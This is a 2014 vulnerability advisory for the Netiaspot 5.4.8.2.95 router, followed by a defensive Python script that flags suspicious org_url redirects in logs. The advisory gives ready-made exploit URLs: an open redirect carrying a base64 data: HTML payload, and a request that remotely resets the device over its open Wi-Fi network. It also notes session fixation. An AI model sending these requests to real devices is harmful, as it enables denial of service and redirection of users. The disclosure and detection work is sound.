Netiaspot 5.4.8.2.95 Remote Denial Of Service

2014.01.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

http://cxsecurity.com/
Maksymilian Arciemowicz

1. Open Redirect

http://netiaspot.home/index.cgi?intercept_id=300&troubleshoot_seq=0&org_url=data:text/html;base64,PEgxPkNYPElNRyBTUkM9Imh0dHA6Ly9jZXJ0LmN4Lz9ORVRJQSI+&no_dns=1&host_mac=22%3a13%3a11%3a12%3ac1%3a12&page=page_close_browser&req_mode=0&strip_page_top=0&strip_page_tabs=0&strip_page_logo=0&scroll_top=0&page_session_id=&button_value=

2. Session Fixation

SESSIONID in URL.

http://cert.cx/0x41424344/hijacking1.png
http://cert.cx/0x41424344/hijacking2.png

3. Remote DoS

Connect to the local unsecured network by wifi FON_NETIA_FREE_INTERNET and ping netiaspot.home. Get the IP and hit

http://[IP]/index.cgi?intercept_id=60&troubleshoot_seq=0&org_url=http%3a%2f%2fcert%2ecx&host_mac=22%3a13%3a11%3a12%3ac1%3a12&page=page_ppp_no_server&req_mode=0&strip_page_top=0&strip_page_tabs=0&strip_page_logo=0&scroll_top=0&page_session_id=&button_value=

http://cert.cx/0x41424344/remotereset.png
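For triage of proxy or gateway logs, the sketch below flags index.cgi requests whose org_url parameter (items 1 and 3) points anywhere other than the router itself. It is an added example, not code from the advisory or the vendor; the allowlist containing only netiaspot.home, the function names and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: the only host org_url should ever send a browser to.
TRUSTED_HOSTS = frozenset({"netiaspot.home"})

def classify_org_url(request_url, trusted_hosts=TRUSTED_HOSTS):
    """Return 'ok', an informational verdict, or 'flag:<reason>'."""
    parts = urlsplit(request_url)
    if not parts.path.endswith("/index.cgi"):
        return "not-index-cgi"
    values = parse_qs(parts.query, keep_blank_values=True).get("org_url", [])
    if len(values) > 1:
        return "flag:duplicate-org-url"
    raw = values[0].strip() if values else ""
    if not raw:
        return "no-org-url"
    # Backslashes and control characters are parsed inconsistently by browsers.
    if "\\" in raw or any(ord(c) < 0x20 for c in raw):
        return "flag:malformed"
    try:
        target = urlsplit(raw)
        host = (target.hostname or "").lower()
    except ValueError:
        return "flag:malformed"
    scheme = target.scheme.lower()
    if not scheme and not target.netloc:
        # Same-origin relative path; anything else without a scheme is odd.
        return "ok" if raw.startswith("/") else "flag:malformed"
    if scheme not in ("", "http", "https"):
        return "flag:scheme-" + scheme      # e.g. data:, javascript:
    if host not in trusted_hosts:
        return "flag:external-host-" + host  # includes //host/ forms
    return "ok"

def triage(request_urls):
    """Return (url, verdict) pairs for requests that need a closer look."""
    verdicts = ((u, classify_org_url(u)) for u in request_urls)
    return [(u, v) for u, v in verdicts if v.startswith("flag:")]

# Constructed sample requests, shaped like the URLs in the advisory.
SAMPLE_REQUESTS = [
    "http://netiaspot.home/index.cgi?intercept_id=300&org_url=data:text/html;base64,AAAA&page=page_close_browser",
    "http://192.0.2.1/index.cgi?intercept_id=60&org_url=http%3a%2f%2fexample%2etest&page=page_ppp_no_server",
    "http://netiaspot.home/index.cgi?org_url=http%3a%2f%2fnetiaspot.home%2fstatus",
    "http://netiaspot.home/index.cgi?org_url=%2f%2fexample.test%2fx",
]

if __name__ == "__main__":
    for url, verdict in triage(SAMPLE_REQUESTS):
        print(verdict, url)
```

The same checks, applied server-side before the redirect is issued, are the usual fix for this class of open redirect.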

References:

http://cert.cx/0x41424344/hijacking1.png
http://cert.cx/0x41424344/hijacking2.png
http://cert.cx/0x41424344/remotereset.png
http://cert.cx/0x41424344/n33tia.txt

